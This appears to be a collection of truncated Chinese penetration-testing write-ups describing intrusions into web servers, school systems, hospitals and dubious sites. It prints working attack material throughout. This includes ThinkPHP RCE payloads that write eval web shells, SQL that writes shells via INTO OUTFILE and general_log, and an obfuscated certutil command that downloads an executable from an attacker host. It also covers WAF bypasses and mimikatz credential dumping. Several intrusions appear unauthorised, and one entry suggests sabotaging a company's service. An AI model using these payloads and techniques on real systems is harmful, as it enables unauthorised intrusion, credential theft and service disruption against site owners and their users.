红队攻击面相关讨论

前言前不久的一次授权测试中，感觉缺少任何一步都无法达到getshell的目的,单个漏洞看得话确实平平无奇，但是如果组合起来的话也许会有意想不到的化学效应。 前期测试拿到这个站的时候一眼就看见了会员登录界面,一开始想着注册，但是觉得会员功能应该很少，没验证码啥的，万一后台管理员也是会员呢那岂不是要是爆破出来了可以去后台尝试一波。 显示的是手机号登录，但是可以尝试下admin,千万不要被他的前台迷惑了。很巧的是可以进行用户名枚举，而且还存在admin账号,不爆破都对不起他 字典呢用的是鸭王的字典,爆破神器，用这个字典爆破出来过不少站点(https://github.com/TheKingOfDuck/fuzzDicts), 这次也很幸运，爆破出来了 拿到后台去登录下,管理员确实喜欢采用同样的密码，登录进去了。看到后台可以自定义上传的后缀心里想可以愉快的交差了，增加后缀php,找上传一条龙getshell。 当我看到上传图片的编辑器的时候我感觉事情并不是那么简单,果不其然那个增加后缀不起作用 后台发现是thinkcmf建站系统，网上搜索能利用的漏洞,看到一个漏洞集合(https://www.hacking8.com/bug-web/ThinkCMS/ThinkCMF%E6%BC%8F%E6%B4%9E%E5%85%A8%E9%9B%86%E5%92%8C.html) 挨个去尝试下无果，继续搜索(https://www.freebuf.com/vuls/217586.html), 基本上能尝试的都payload都试了试,应该是版本高漏…

0x00 前言上面给了个任务，一看，地图系统，懵逼了，这种的系统一般就是调个百度地图的api，无交互，想要挖洞简直难上加难... 一波信息收集后，发现该主站一个功能可以跳转到该单位的微信公众号，且存在上传点，因此有了本文。 0x01 FUZZ有了上传点，废话不多说先看看后缀能不能过 先传一个图片，更改后缀尝试上传 直接没了，难道是白名单吗，尝试随意后缀上传 发现可以上传，可能是存在waf？ 直接传内容为一句话，看看会不会被拦截 结果没被拦截，应该是代码对后缀做了一些操作， 接下来就是一顿fuzz，搞了半天发现后缀名这边是过不去了，换行大法直接报错 拿出之前过安全狗的方法试了一下，溢出Content-Disposition:字段， 竟然就这么成功了... 0x02 又一个问题现在传是传上去了，但是没有返回完整路径，也不知道传哪儿去了，这咋整 扫当前目录啥也没扫到 然后扫了波一级目录，发现存在upload目录， 尝试拼接，成功getshell 0x03 总结1.通过目标站点的公众号处存在一处附件上传，那么可能存在任意文件上传漏洞2.通过bp的intruder功能对后缀名进行批量fuzz，发现都被拦截，这里又测试上传test.aaa，内容为this is a test,发现可以上传，那么猜测目标站点存在WAF,拦截了后缀名3.接着测试上传的内容为一句话木马，可成功上传，并没有对内容进行拦截3.通过Content-Disposition:拦截字段填充可绕过waf成功上传，并返回上传的文件名，但是并不知道上传的路径如:Co…

0X01 找到注入点故事的起因还是因为我太闲了，上班摸鱼。 摸着摸着就摸到了某个网站的查询框。 接着老毛病就犯了，上去就输入了个1查询 接着输入了1’ 啧啧啧，这明显有SQL注入哇。 果断掏出SQLMAP神器。 结局很完美，不仅存在注入，还是DBA的权限。 0X02 网站get shell利用SQL注入去get shell有几种常见的方法，一种是跑数据，跑目录找到网站的管理后台，进入到后台想办法通过文件上传的等方法去拿shell；要么就通过报错，phpinfo界面，404界面等一些方式知道网站绝对路径，然后去写入shell，不过相对于mysql来说条件还是有些苛刻的。 接着就是掏出御剑开始扫网站目录，目录还挺多。 随意点开了个admin 我去，竟然存在目录遍历。 接着又点开了00/ 一口老血喷出，这，还没开始就结束了？？？ 绝对路径不请自来，竟然还是最常见的路径，早知道直接--os-shell跑常见路径了-- 含泪拿着绝对路径，直接SQLMAP中--os-shell 这里有个点要了解一下，sqlmap中mysql数据库--os-shell的时候，sqlmap先写入一个文件上传shell tmpxxxx.php，再通过文件上传shell上传命令执行shell tmpxxxx.php，再利用命令执行shell执行命令。 具体可以去雨九九大佬博客学习一波。 https://www.cnblogs.com/Rain99-/p/13755496.html 所以这里我就直接用sqlmap文件上传的shell去上传我的shell了 …

0x01 前言当一个企业把他的业务放到腾讯云或阿里云等公有云的时候，其是与企业的内网是不相通的，相当于逻辑隔离了(非物理隔离)，如果企业信息安全做的相对较好，不暴露VPN地址或者路由器或防火墙业务，信息收集的时候，是很难进精准定位到企业的内网使用的公网地址的。这个时候，想要渗透内网相对困难。 下面就介绍一下我从公有云到渗透进内网进行漫游的实际渗透过程。 0x02 前期打点怎样拿下云服务器的不是本文重点，故不做详细介绍，只简单介绍思路。 根据公司名字，直接百度，发现官网地址。根据官网地址，进行了一波信息收集： 发现站点使用了CDN，是腾讯云主机，ip是变化的，无法探测真实IP；发现存在任意命令执行漏洞。直接RCE，拿下服务器权限；先看下ip地址 发现显示的是内网地址，这个时候，查看下真实的ip，虽然这个对接下来的内网渗透没什么diao用。 到此才发现是腾讯云，主机不在内网。 0x03 想办法打内网这个时候，我就要办法获取公司办公网的外网IP了，这个外网ip要么是防火墙的，要么是路由器的。怎么获取呢？我想到了一个办法，一般云主机，运维人员会通过ssh来进行管理，一般在上班时间，他们会连接进来，这个时候，就会获取到公司的真实公网IP。 教大家一个小技巧，如果是小公司，运维可能十天半个月都不会连上来，这个时候，我们就可以搞点“小破坏”，逼迫运维上线。 比如关闭它的web服务等等，大家千万注意两点： 动作不要太大，免得被运维发现被黑，当然你可以提前做权限维持，这里不做介绍；没有“授权”，千万不要乱搞；没有授权，千万不要乱搞；没有授权，千万不要乱搞，…

前言最近对云安全这块比较感兴趣，学了一波k8s的架构和操作，正好遇上了华为云的这一场比赛，收获颇多。 (甚至通过非预期拿下了平台题目集群的最高权限)。 0x00 题目入口发现拿到题目发现是一个类似于提供IaaS服务的站点，扫描了一波目录，发现几个文件以及路由: phpinfo.php robots.txt admin/ login/ static/挺奇怪的是，在一个存在phpinfo的环境下发现了一个beego框架后端的403界面： 初步猜测是.php的文件交给了nginx fastcgi进行处理，而其他路由则是交给了beego进行处理。 接着我们先看/admin路由，发现存在一个隐藏的表单 因此自然的想到使用burpsuite进行弱口令的爆破，发现存在弱口令 admin:admin 登录成功后返回了两个url， 下载 tools.zip，同时根据名字猜测/wsproxy是一个websocket的代理路由，而查看tools的源码发现是一个wsproxy的客户端程序。 至此，我们找到了进入内网的通道。 0x01 wsproxy 进入内网直接对拿到的tools源码进行编译，获得客户端连接程序 根据使用说明，我们可以通过简单的命令连接上题目的wsproxy,同时密码为tools源码目录下的 pass.txt(UAF)，session就是我们登陆admin后，题目给的beego session 这样会在本地的1080端口开启一个 socks5 代理，通过这个代理，我们就能够连入内网。 0x02 phpinfo泄露k8s集群信息由于这道题目的名称 …

首先在奇安信hunter上搜索找到该SRC的有关资产（具体我就不放了），然后通过微步来搜索子域名找到今天的测试站点。 然后利用xray中检测到该站点存在Shiro反序列化漏洞 于是考虑直接用feihong的反序列话工具，但是这次feihong的反序列化工具只检测出key，gatget没有检测出来，咨询了同事琛哥后，故考虑到是因为工具很久没更新，需要找一条CB的链，啪的一下回车 直接开冲，先看下系统中是否存在杀毒软件，一目了然，系统中存在火绒杀毒软件。 在确定了目标系统存在火绒后我第一时间尝试了hta上线，相关文章内容：记一次绕过火绒安全提权实战案例 不过很可惜这个方法我在本地多次尝试后发现火绒已经对这个方法进行了拦截和查杀。 后续和3h师傅交流应该是对文件的特征进行了查杀，不过也没有在深一步探索绕过的方法。 题外话：这里测试的时候有一个小坑，感觉是工具的问题，工具在执行需要大量回显的数据包时会卡死，需要重新启动工具再执行一次命令才行。 这里绕过火绒选择了certutil远程下载方式，常规的cerutil直接下载肯定是不行的，于是想到了以前群里有师傅发过的变形版的certutil绕过方式。在本地测试后发现火绒没有拦截该命令，此时激动的小手已经焦躁不安。 "c""e""r""t""u""t""i""l" -"u""r""l""c""a""c""h""e" -split -f https://url/1.exe 1.exe题外话：发现目标系统不解析我vps的IP，搞得我晚上凌晨还在四处找人要VPS，感觉还是得随时准备一台国内的vp…

0x01 前言某日闲来无事，上fofa搜了xx系统，想着碰碰运气，类似这样 0x02 测试过程随便挑了一个站点打开 Em…，试试运气，反手admin admin就进去了，是一个管理系统 然后根据网站的功能点，随便点击几个，发现除了常规的操作也没啥了，翻了一会，发现有一个文件下载操作 好家伙，藏得挺深，抓包看看，请求的地址好像是一个文件 fileName改成../etc/passwd看看，好家伙，报错了 看来应该不是这个路径，随后依次尝试了../../etc/passwd和../../../etc/passwd都是500错误，到了../../../../etc/passwd的时候就能访问到了 再看看能不能读历史命令，如果可以读历史命令，可以看看有没有网站备份文件或者网站安装包，嘿嘿，改路径为/root/.bash_history，访问！….500错误 看来应该是权限不够。没办法了，从其他地方入手吧。 接下来可以F12看看网站源代码，用源代码中标志性的语句或者文件去fofa搜索相同的系统，说不定会有root权限，大概像这样 有了相同的系统之后，再次尝试弱口令 可能是最近运气不错吧，弱口令又进去了。嘿嘿 接下来尝试刚刚的操作，下载../../../../etc/passwd文件看看 再试试读历史命令/root/.bash.history 可以读到历史命令，慢慢翻，最终发现有网站源码 反手下载下来 解压一下 JSP的站，没学过java的我裂开了，先跟着历史命令把环境搭起来，于是在自己服务器上部署了一样的系统。 没学过java，自动…

0x01 站点1：文件上传 发现源代码泄露打开自己珍藏已久的辣鸡字典，扫描发现存在bin.zip信息泄露，尝试进行代码审计 文件位置：SimpleDataPlatform.SimpleDataPlatform.fileUpload 找到ProccessRequest接收请求，可以看到获取了一堆参数后（初始化），后进入了HandleFiles方法， 跟进HandleFiles进行处理，如果dateType=ZBJHSB时，就继续处理请求，dateType为GET传参 路径为/Uploads/SetData/ZBJHSB，str名称为时间戳，且str2(后缀)没有进行限制就进行保存， OK，这应该是一个妥妥的任意文件上传了，只要有返回值，那么这个站就没了。但是很不凑巧的是，他没有返回值。 由于方法fileUpload，瞎猜文件名为 fileUpload.aspx fileUpload.ashx fileUpload.asmx fileUploads.aspx fileUploads.asmx fileUploads.ashx Upload.....等加上自己现有的字典爆破了一波,成功找到了返回了200的文件名http://xxx.com:6039/FileUploads.ashx 直接构造上传表单，这里Form里的name字段应该是没有具体设置的（代码里没有找到），发包后返回200，可能真的传上去了吧？ POST /FileUploads.ashx?DataType=ZBJHSB HTTP/1.1 Host: xxx.cn:6039 C…

0x00 起因此次接到的项目是对某客户端进行安全测试。之前的工作内容除了偶尔测测 App 之外，大部分的测试目标还是以 B/S 架构的 Web 为主，这是第一次对 C/S 架构的客户端进行测试，所以也是两眼一抹黑，只能先按照测 Web 的常规思路来了。0x01 抓包首先查看目标客户端是否存在代理配置功能（大多数没有） 可以看到只有个简单的登录功能，并无代理配置功能Proxifier + BurpSuite查看 BurpSuite 中配置的代理地址及端口 在 Proxifier 中添加代理服务器（ip、port 为 BurpSuite 中配置的代理地址及端口） 配置好后，进行检查，测试与 BurpSuite 的连通性（BurpSuite 中有流量即为成功连通） 在 Proxifier 中添加代理规则 BurpSuite 成功拦截到客户端的登录请求 0x02 数据包分析成功拦截到数据包之后，便打算对其进行分析，结果一看就绝望了，请求包跟响应包均被加密 尝试 Web 访问之前测 App 时遇到过手机端流量被加密但 PC 端未加密的情况，遂复制请求链接尝试 Web 访问，并未获取到有效信息 由于该客户端内相关功能的请求参数均以 POST 方式传输，流量均被加密，所以暂时放弃，转变思路打算从服务器入手0x03 柳暗花明WebSphere对目标服务器进行端口扫描，发现开放的端口还挺多，9043、9060分别为 WebSphere 默认的管理控制台安全端口、管理控制台端口 默认登录地址为 /ibm/console，此处用默认的用户标识 admin 成…

0x01前言下文的所有漏洞都是需要有学校统一门户的账号和密码的情况下才能挖掘出来的，不过我也有挖到个别特殊的学校个例，可以直接未授权访问那些目录页面造成危害。挖掘的案例均已提交至漏洞平台并已经修复。 0x02 渗透过程首先登陆统一门户，登录账号密码，找到学工系统页面： 1.越权漏洞： 访问以下的路径： http://x.x.x.x/xgxt/xsxx_xsgl.do?method=showStudentsAjax&isAll=true 然后便可查看所有学生列表： http://x.x.x.x/xgxt/general_szdw.do?method=szdwRybb&lx=fdy 然后便可查看所有辅导员列表： http://x.x.x.x/xgxt/xsxx_xsgl.do?method=getXsjbxxMore&xh=某学号 然后便可以查看该学号的学生的敏感信息： 最后根据该漏洞可以编写个脚本，来批量获取系统内用户的敏感信息，效果如下： 2.任意密码重置漏洞： 访问该路径： http://x.x.x.x/xgxt/mmzhgl_mmzh.do?method=xgmm&yhm=想要修改的账号 然后可以将系统内置的超级管理员账号的密码重置，我重置为test0123： 然后再退出到http://x,x,x,x/xgxt/的学工系统登录页面，重新登录： 登录成功： 既然是超级管理员，那么便可查看到许多敏感信息了，这里就不截图和赘述了。 3.文件上传漏洞（需要绕…

0x01 弱口令在一次针对某站点信息收集的过程中，通过子域名扫描，扫描到某个老旧系统。 一看这都2014年的老站了，肯定有搞头！ 日常使用burp爆破一波试试，没爆破出来 但是随手一试，好家伙123/123进入系统，属于是运气拉满了 （高强度打码） 这里能看到是一个“编辑”人员的权限，并没有什么上传等后台管理的功能，只能耐心过一遍系统的各种功能。 0x02 SQL注入进入系统翻一翻，没有什么敏感信息泄露，但是在一处查询人员信息的接口发现了SQL注入（xray被动扫描扫出来的） http://host.com/xxx/control/SearchMenHunInfo?content=123 这时想要手工验证一下，发现甚至不需要后台cookie就能直接访问该接口，相当于还存在未授权访问漏洞。 那这sqlmap一把梭，--cookie参数都不用加了 这里跑出了库名，还能看到这是一个Oracle数据库。打算继续拿shell试试。 但是在我日常渗透过程中，Oracle数据库并不常见，sqlmap中--os-shell参数还是不支持Oracle数据库的，只能现学现卖一波。 0x03 getshell首先参考了这篇文章 Oracle注入 - 命令执行&Shell反弹 文章中介绍到以下版本的Oracle在发现注入后可以命令执行 那么再用sqlmap查看一下Oracle版本 看来是符合可以命令执行的版本的！ 又经历了一波漫长的学习，发现了github一个大佬已经集成好的工具 oracleShell oracle 数据库命令执行 工具…

0x00 漫长的探索 某天，接到一个任务，要求对某医院的信息系统做一次安全检测，看能否发现问题。经过初步的信息收集后，发现该医院并无官网，只有一个微信公众号提供了预约挂号，缴费等功能，看来只能把突破点放在这个公众号上了。 下图是微信公众号的一些功能： 当点击这些功能并抓包的时候，令我看到奇怪的是所有的请求都指向了a.test.com这个域名，如下图，原谅我的厚码... test.com这个域名经过查找后发现是一家提供医疗信息系统的本地公司,但不解的是为什么医院的系统会放到供应商公司去呢？他们是如何进行数据同步的呢？带着这些问题我开始了对a.test.com这个域名的测试。 看到这个熟悉的页面，确定了此系统大概是由sping boot开发的，经过一系列常规操作后，只发现了一个swagger-ui页面。 由于我们的目标是拿权限，所以重点对此页面的接口进行了sql注入和越权等测试，无果，也没有任何的文件上传接口,开始卡到这里了。 回过来想，a.test.com这个域名是test.com的子域名，是否能够通过test.com进行突破呢？ 访问test.com,打开的是供应商公司的官网。 对test.com的域名做信息收集后发现了几个子域均解析致某云服务器，但是ip不同。 首先git.test.com这个域名引起了我的注意，打开后是一个gitlab服务。 gitlab历史上是由几个漏洞的： 但不幸的是此系统版本较高，漏洞均以修复。 那会不会由弱口令呢？使用几个常用的用户名和top密码进行爆破，无果，我又想办法加到了此公司的一个qq群…

0x01 目标 country="US" && app="APACHE-Axis"从老洞捡些漏网之鱼，没准还会有意外收获 目标出现 还是熟悉的页面，熟悉的端口 然后尝试默认口令登录，ok, 这下稳了 先搜集一下信息 不要上来就部署包，先看一下现有的服务，像这种弱口令的基本上99.9999%都已经被人搞过了 再上传包就多此一举了，可以直接利用 找了一圈没发现遗留的马儿 找绝对路径自己上传 C:/elocker/webapps/admin/WEB-INF/classes 顺手一测，竟然可以出网，也不需要传shell了，直接掏出cs 执行命令 看结果失败了 0x02 反弹shell难道是因为在url里执行，导致powershell命令没有执行成功吗？ 带着这个疑问 反弹shell尝试一下 结果还是失败，可以确定，应该是有waf 0x03 写入shellx.x.x.x:8080/services/config/download?url=http://x.x.x.x/dama.txt&path=C:\elocker\webapps\admin\axis2-web\shell.jsp 查看一下进程 通过对比发现某安全卫士 0x04 绕过杀软通过测试发现，最基本的net user也执行不了 摆在面前的路只有2条 做免杀抓密码果断选择抓密码，简单有效。 mimikatz不免杀不可直接用 这里我利用procdump把lsass进程的内存文件导出本地，再在本地利用mimikatz读取密码 上传 procdum…

0x00 信息收集由于主站存在云waf 一测就封 且初步测试不存在能用得上的洞 所以转战分站 希望能通过分站获得有价值的信息 这是一个查询代理帐号的站 url输入admin 自动跳转至后台 看这个参数 猜测可能是thinkCMF 0x01 getshellthinkcmf正好有一个RCE 可以尝试一下 白屏是个好兆头 应该是成功了 访问一下 尝试蚁剑连接 直接报错 猜测可能遇到防火墙了 然后再回来看一下shell 手动尝试一个phpinfo 果然存在宝塔防火墙 0x02 绕过宝塔防火墙宝塔应该对部分函数进行了过滤，所以直接传递payload肯定是不行的，所以我们需要对流量进行混淆加密。 尝试将所有的payload Base64编码传输 既然传过去的是编码后的Base64，小马也应该相应做出改变，只需解密一次传递过来的base64即可。 小马如下： <?php @eval(base64_decode($_POST[zero]));?> 将phpinfo();base64编码为 cGhwaW5mbygpOw== 发送 可见 宝塔防火墙没再拦截 已经成功绕过宝塔防火墙 0x03 改造蚁剑我们用到的是Base64编码，但是蚁剑其实是自带Base64编码解码器的 。 尝试直接使用自带的Base64编码器 为什么会这样呢？ 我们尝试从蚁剑的流量分析 设置代理到burp 拦截流量 我们可以看到 明显有两个地方容易被waf识别 一是：User-Agent头的关键字：antSword/v2.1 这相当于直接告诉waf我是谁…

0x00 前言在某次做渗透项目时，客户只提供了一个IP。作为菜鸟的我开始远航。 0x01 信息收集Nmap扫描一下端口，注意扫描高位端口，往往有意外收获。 弱口令尝试登录。 简单汇总一下。 0x03 漏洞探测登录进后台测试发现两个系统均存在sql注入。 还在8000端口上的crocus系统中找到一处任意文件下载漏洞。 原来是日志下载。点击发现页面中存在绝对路径。 OK！！！收集一下绝对路径。 现在的思路是： 在有绝对路径的前提下，配合sql注入，利用sqlmap的—sql-shell尝试可以写一句话木马。 0x04 漏洞利用仔细看这个绝对路径。听说仔细盯着它看会有奇效。（笑） WCMS4.0这个好像在哪见过。 没错。就是12055端口，登录后台 可以利用这个后台的sql注入来写shell。 sql注入点大概在搜索位置。 拦截数据包，保存为post.txt。使用sqlmap开始注入。 有注入，有dba权限，有绝对路径。shell一条龙就此准备。 0x05 Webshell开始写入aspx一句话木马。 select '<%@ Page Language="Javascript"%> <%eval(Request.Item["pass"]);%>' INTO OUTFILE 'C://Program Files (x86)//CMS Server//WCMS4.0//x.aspx' 没毛病，访问一下。 Nice！！！ 菜刀连接。 …

0x00 前言之前接触tp5的站比较少，只知道利用RCE漏洞getshell的方式。在最近对一个发卡平台渗透的过程中，由于php版本限制，无法直接使用RCE的payload拿shell，于是结合该网站尽可能多的测试一下tp5+php7.1环境下的getshell方法。 0x02 正文拿到站点后，访问首页如下 测试中，发现是thinkphp的站，报错如下 不过看不出来具体版本，不确定是否存在RCE，于是用exp打一下试试 _method=__construct&method=get&filter=call_user_func&get[]=phpinfo 发现执行成功了，disable_function禁用了挺多函数 一般php版本低于7.1的情况下，接下来直接用exp写shell就可以了 方法一 直接用下面的exp写shell s=file_put_contents('test.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert 但是这个exp中使用了assert，而上面看到php版本是7.1.33，这个版本是已经没办法使用assert了，所以这里这个方法是不能用的 方法二 上面的exp没办法写shell，但是phpinfo是执行了的，那么RCE是存在的。于是想到可以通过读取文件读取数据库的账号密码，然后找到phpmyadmin，就可以通过数据库写shell。 于是首先通过phpinfo…

0x00 信息收集接到一个紧急测试任务，只有一个目标名称（某某医院）和一个ip。 首先，使用goby一把梭对拿到的ip来个全端口扫描： 服务包括Weblogic，jboss，springboot，Struts2，以及其他各式各样的系统（简直就是Nday练习靶场） 0x01 外网渗透其中尝试了利用jexboss打jboss反序列化，Weblogic的反序列化（10.3.6.0版本），Weblogic的其他CVE漏洞利用，springboot的未授权，Struts2的反序列化漏洞均失败 但是在8282端口的临床技能中心管理平台发现了弱口令 （admin/admin）可成功登陆到后台： 经过测试，目标的字典管理下的屏幕信息管理系统的设置显示图片处存在任意文件上传 只需要将png后缀的jsp马上传，在利用BurpSuite直接抓包改为jsp后缀即可 上传完毕后，访问目标url，webshell存在，但是利用Godzilla直接连接会失败 经hum大师傅的发现，在链接时需要带上当前页面的cookie（这里目标对url做了强制跳转，如果未登陆，都会条回到Login页面。) 这样的话webshell的url就无法正常访问了）带上cookie即可正常连接（cookie到期后，webshell便会掉）。 连接成功后，为了稳定webshell，我们尝试将webshell写入到根目录和静态文件的目录，但是仍会受到强制跳转的影响。 于是将webshell内容写入到了在登陆前就能访问的jsp正常文件中，来稳定shell。 0x02 内网渗透之后对目标…

0x01 前言备考的时候偶然点了进了本校内网的某个站点 , 停下了复习(直接拔剑) 0x02 渗透过程测试到注入 http://url/newdetail.aspx?id=11999' or 1=1 -- 直接Sqlmap一把过 , 连waf都没得(狗头) 随便看看 python sqlmap.py -u "http://url/newdetail.aspx?id=119" --batch --dbs python sqlmap.py -u "http://url/newdetail.aspx?id=119" --batch -users DBMS sqlserver 2005 whoami 在windows中nt authority system 是内置的系统管理账户 查看下目录chdir Dir c:\ OS版本 Microsoft(R) Windows(R) Server 2003, Enterprise Edition ipconfig 服务器端存在certutil等于是决定测试一下命令 vps python -m SimpleHTTPServer 80 打一下 ping wt070h.dnslog.cn certutil.exe -urlcache -split -f http://funny_ip/amazing1x 发现回显 奈何网站路径是中文的 , sqlmap写木马的话会乱码 , 找了找解决办法无果 看看环境变量 Nmap看看端口 因为尝试远程连接的时候出了一些问题，起初不知道是什么原因所以打…

0x01 确定目标 主站： 旁站： 0x02 漏洞利用通过信息收集发现是个tp v5.0.9，此版本存在tp-rce漏洞。 直接通过payload进行测试， Post：_method=__construct&filter[]=assert&method=get&get[]=phpinfo() 查找payload，直接打： Post：_method=__construct&filter[]=assert&method=get&get[]=phpinfo() 发现是php 5.4.45版本的， 直接尝试getshell： 发现system被禁用，尝试其他系统命令的也一样。 查看phpinfo中desable_functions禁用了那些函数。 想办法怎么绕过进行写马（此处卡了我半天） 最后通过一位渗透小伙伴，想出下面的可以利用file_put_contents直接写shell，想了半天，忘了用其他函数进行直接写马就可以了，并不需要非得利用system命令进行写马，还是底层知识薄弱啊。再次感谢小伙伴！ 0x03 getshell构造payload： _method=__construct&filter[]=assert&method=get&get[]=file_put_contents('a.php','<?php eval($_POST[a])?>') 写入成功，利用菜刀连接。 成功连接。 查看权限： 发现启动了远程安全模式。 想要绕过…

0x01 前言找到某色情app的界面 看了看功能点，有一个注册的地方，但是注册的时候居然要邀请码！！！ 0x02 渗透过程于是将app放到虚拟机，通过抓包拿到其真实域名 然后利用bp的爬虫爬到一处api接口 提示参数缺失 fuzz一波参数 http://www.xxxxxxx.cn/api/index/tab3?p=1&t=3&v=0&s=0 通过sqlmap进行注入 但是不是DBA 也无法写文件 数据库实在太乱了 懒得一个一个的读 目前后台地址也还没找到 而且这个站及其的卡 思路完全乱了，， 想着先利用注入搞一个账号出来 然后登录该app,看看app内有无什么可利用的 但是除了一处留言反馈准备测试xss之外，就是各种诱惑。。。。 留言框只允许中文以及中文符号，但是却是使用js进行验证，抓包即可绕过 对着该处留言框就是一顿乱插 中途等了大概10分钟 就当我以为要失败的时候 果然，，菜逼运气好== 拿到后台登录地址 虽然没有cookie 但是利用注入点读出了后台账号密码 最后登陆后台 看了看后台，app总用户达到1w+…一天用户增加500+ 翻了下后台的功能，发现一处图片上传，而且似乎是js验证的图片类型 但是在实际上传中 各种失败，应该是前台js验证+后端功能让所有上传的文件强制改名为.jpg 接下来的事就比较好玩了，虽然拿到了后台，但是没法突破，没卵用 于是我添加了后台留的一个QQ号 对方秒通过，经过简单的交流，发现他是这套程序的二开作者，售卖给别人被别人用来当作…

0x01 前言由于疫情问题，学校的易班APP新增了打卡系统，每天需要进行晨检，午检打卡，忘记的话就是上千字检讨 本人对于这种“形式主义”深感不满，适逢最近成立了网络安全战队，于是准备操作一番 0x02 踩点基本的信息搜集咱们就不多说了 因此不同系统使用了不同的多台服务器 看样不能一劳永逸，需要各个系统、服务器奇妙的学校系统渗透之旅，拿下核心系统， 然后摸入核心系统中 首先打开“易班”系统的首页是这个样子 不难看出，开发者使用了TP框架，在简单地测试了各种TP 注入， RCE的payload后均以失败告终，看样安全意识还不算太差 域名下的首页完全就是一个报错页面，没有任何功能点和信息 俗话说得好，信息搜集的好坏直接决定了我们渗透的成败，因此我们绝对不能疏忽大意。 我们先来fuzz一级目录 成果还不错，不少目录和功能点， 随后我们继续fuzz各个一级目录的二级目录，不断摸索该域名下部署的功能点 具体的就不上图了，因为一级目录太多了。 了解清楚功能点后，直接脱裤子开干 0x03 心理健康系统的渗透（IIS短文件名-->老登录口-->爆破-->新登录口-->上传）通过一级目录爆破，爆破出 http://xxx.xxx.edu.cn/psy这个路径 发现其中部署了心理教育健康系统，中间件为IIS 但是心理健康系统登录口有验证码机制，而且验证码不容易识别 立马想到iis短文件名特性 随后通过iis短文件名目录扫描工具 （https://github.com/lijiejie/IIS_shortname_Scanne…

0x00 使用关键词得到目标源码某日上午接到临时安排对某公司进行渗透测试，此次渗透给的是一个主域名，并且也没有子域，打开了目标网站先对其进行一波信息收集 中间件: IIS 8.5 输入admin发现自动添加了/ 说明其目录存在，那么盲猜一波文件，login.aspx default.aspx main.aspx 等等 最终在login.aspx下面发现后台登录页面。这不猜他一波弱口令？？ 一顿操作过后账号被锁 熟悉的开局，既然如此只能尝试其他方法了。 在主页的html代码中发现了某处信息 设计制作？根据后面的域名访问过去，是一个建站公司 那么，入手点来了。IIS8.5+ASP.NET+建站系统 先扫一波备份文件: 400多条ip这开发商还行。使用FOFA查询工具，批量导出 然后我们来扫一下备份文件。这里推荐我B哥的扫描器 https://github.com/broken5/WebAliveScan 可以进行批量存活扫描和目录扫描 在好几个站下面发现web.zip备份文件。 下载下来过后，对其目标站点文件进行了对比。基本一致 0x01 拿到代码开始审计多次碰壁那么开始审计。 在某接口处放下敏感操作 WebClient.DownloadFile (远程文件下载) 由于该方法需要提供绝对路径。。比较头疼，但我跟踪相关参数。发现。 在另一个方法中调用了该方法。 并传入Server.MapPath，这根本不需要找绝对路径了系统都给你安排好了。 那么构造POC: ashx/api.ashx?m=downloadfile&amp…

0x01 收集信息因为主要想练习sql注入，所以信息收集做的比较简单： 通过fofa找到相关cms，这里发现棋牌后台登录处存在SQL注入漏洞 0x02 漏洞利用1.利用sqlmap一把梭，并获取os-shell 2.利用python搭建一个简单的http服务器，并挂载MSF生成的后门文件 python -m SimpleHTTPServer 3.os-shell下远程下载后门执行程序 在os-shell下通过命令创建一个目录 mkdir C:\test 在os-shell下通过certutil命令远程下载后门文件到服务器上 4.执行msf反弹shell use exploit/mulit/hander set lhost 接收反弹shell的ip run 5.成功进入该服务器 这时发现我们只有gust权限 难受 6.对目标服务器进行提权 提权方法：内核提权以及窃取管理tokens提权 本文只利用窃取管理tokens提权 使用use incognito来加载会话令牌模块 然后list_tokens -u来列出会话令牌 7.创建用户 命令：net user 用户名 密码 /add 0x03 渗透总结1.通过SQLmap获取os-shell2.在msf下生产后门文件3.通过python -m SimpleHTTPServer 搭建http服务器，并将生成的后门文件拷贝到到http服务器目录下。2.在os-shell模式下创建目录，并通过certutil远程下载http服务器上的后门。4.通过MSF反…

一、事情的起因这位兄弟找到我,告诉我被骗了很多钱,我们这些正义的白帽子当然能帮则帮啦.当然,毕竟是杀猪盘,即便是拿下也不能把钱追回二、信息收集拿到目标网站，可见是一个很常规的bc站,而且做的有点low逼。先进行简单的信息收集通过Wappalyzer插件可见php版本与windows serve这两个比较重要的信息命令行nslookup+url查看ip,发现没有CDN再到站长工具上看看 http://s.tool.chinaz.com/same香港的,羊毛出在羊身上,中国人在骗中国人?知道ip地址后端口扫描一波（全端口扫描+服务探测。这个过程比较漫长，可以先干别的） 看到开放3306端口,连接一下看看 发现不行,应该是不能外连三、后台攻陷回到web，反手在url后面加一个admin 发现不行,这才想起来一般BC的后台都是单独存在的既然如此,只能找一找xss了先注册账号登录进去看看填写的都是虚假信息,请勿当真进去以后是酱紫,感觉很熟悉,好像之前有过0day奥,好像是在存款的地方试一波提交看看xss平台能否收到cookie收到了cookie,确定xss存在,下一步登录后台此处可以看到,用户其实不少而且被骗的用户都会被管理员删除账号导致现在的用户看着很少四、寻找上传点看到有数据库备份,但是发现不可以下载,放弃之后问了群里的大佬,大佬说可以做一个flash钓鱼,源码我下载以后,发现做flash钓鱼需要具备三个条件我就果断放弃了条件:一个免费空间一个免费域名（域名可以搞一个 www.flashxxx.tk 这种的，可信度比较高） 这个可以正常上线的马…

确定目标 收集信息x.x.x.x首先常规测试方法一顿怼，目录扫描，端口扫描，js文件，中间件，指纹识别，反正该上的都上。。。。 随手加个路径，报错了，当看到这个界面我瞬间就有思路了 为什么这么说呢，因为之前我就碰见过这样的网站报错， 这是一个php集成环境,叫upupw，跟phpstudy是一样的 upupw --> pmd phpstudy --> phpmyadmin突破点这个集成环境包也有个phpinfo的页面，跟数据库管理界面 u.php 测试一下弱口令 root/root 连接成功后就可以看到phpinfo的页面 好了现在问题变成phpmyadmin拿shell getshell三步拿shell set global general_log='on'; SET global general_log_file='D:/xxxx/WWW/cmd.php'; SELECT '<?php assert($_POST["cmd"]);?>';当执行第三步的时候页面 卡在执行中。。。没有反应 瞬间感觉不对，可能存在waf 换了个免杀马试试，先写到txt里边看看成否成功 没有任何问题，下面直接写入php文件 可以写入，直接去连接shell 果然有waf,当时写入的时候就感觉到了，不免杀的shell，sql语句执行不了 绕过waf怼了半天都不知道是什么鬼waf，用下载文件试试 为了避免拦截php代码的waf，我这里远程下载的脚本是利用JavaScript转写php SET global general_lo…